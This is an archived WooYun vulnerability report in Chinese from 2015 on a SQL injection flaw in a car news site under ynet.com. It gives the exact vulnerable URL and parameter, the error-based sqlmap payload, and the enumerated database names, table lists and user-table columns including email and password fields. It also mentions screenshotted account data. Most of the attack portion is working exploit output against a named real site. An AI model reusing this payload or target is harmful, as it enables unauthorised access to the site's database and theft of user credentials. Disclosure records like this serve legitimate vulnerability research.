乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-24: 厂商已经主动忽略漏洞,细节向公众公开
北青网下某域名北青汽车存在SQL注入漏洞,可导致大量数据泄露
北青网.汽车http://auto.ynet.com/注入点:http://auto.ynet.com/cgi/newslist.php?dir=101
列举所有数据库:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: dir Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: dir=101' AND (SELECT 5309 FROM(SELECT COUNT(*),CONCAT(0x3a6163713a,(SELECT (CASE WHEN (5309=5309) THEN 1 ELSE 0 END)),0x3a6a74733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AFom'='AFom---available databases [3]:[*] foodbq[*] information_schema[*] web_2_1
当前数据库表
Database: web_2_1[40 tables]+---------------------------------------+| article_from || auto_ad || auto_bang || auto_beauty || auto_big_brands || auto_bqyc || auto_brands || auto_cars || auto_comment || auto_index || auto_photo || auto_subbrands || auto_zhuanti || baojia_4s || beauty_album || beauty_index || blank_data || complain || dealers || fenlei || fenlei_beauty || friend_links || global || index_car2013 || market_cars || navcode || navigation || news || news_top || polymorphic || sp_t28 || sp_t32 || sp_t33 || sp_t34 || sp_t35 || sp_t36 || temp || tempdef || tuijian_top || user |+---------------------------------------+
当前数据库user表
Database: web_2_1Table: user[12 columns]+----------------+| Column |+----------------+| createdatetime || creator || cu_id || d_id || email || mender || mu_id || nick || passwd || published || savedatetime || url_1 |+----------------+
截图部分用户账号数据:email,passwd
foodbq库表
Database: foodbq[25 tables]+---------------------------------------+| article_from || auto_ad || auto_comment || auto_index || blank_data || complain || fenlei || food_person || food_right || food_topic || food_topic1 || friend_links || global || navcode || navigation || news || news_top || news_top1 || pic_defaults || polymorphic || sp_t28 || temp || tempdef || tuijian_top || user |+---------------------------------------+
information_schema库表
Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
过滤
未能联系到厂商或者厂商积极拒绝